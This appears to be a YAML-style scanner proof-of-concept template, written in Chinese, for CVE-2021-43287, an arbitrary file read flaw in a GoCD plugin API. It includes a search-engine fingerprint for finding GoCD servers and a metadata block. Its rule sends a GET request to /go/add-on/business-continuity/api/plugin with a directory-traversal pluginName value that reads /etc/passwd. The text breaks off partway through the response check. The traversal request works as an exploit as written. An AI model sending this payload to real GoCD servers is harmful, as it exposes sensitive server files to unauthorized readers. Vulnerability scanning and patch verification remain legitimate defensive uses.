网络测绘
title="Create a pipeline - Go"
POC
id: GoCD plugin
info:
name: GoCD plugin 任意文件读取漏洞 CVE-2021-43287
author: 不动明王
severity: high
description: |
GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息
reference:
- http://wiki.peiqi.tech/wiki/webserver/GoCD/GoCD%20plugin%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2021-43287.html # - 插入列表
rules:
mingzi1:
request:
method: GET
path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../etc/passwd
expression: response.status == 200 && response.b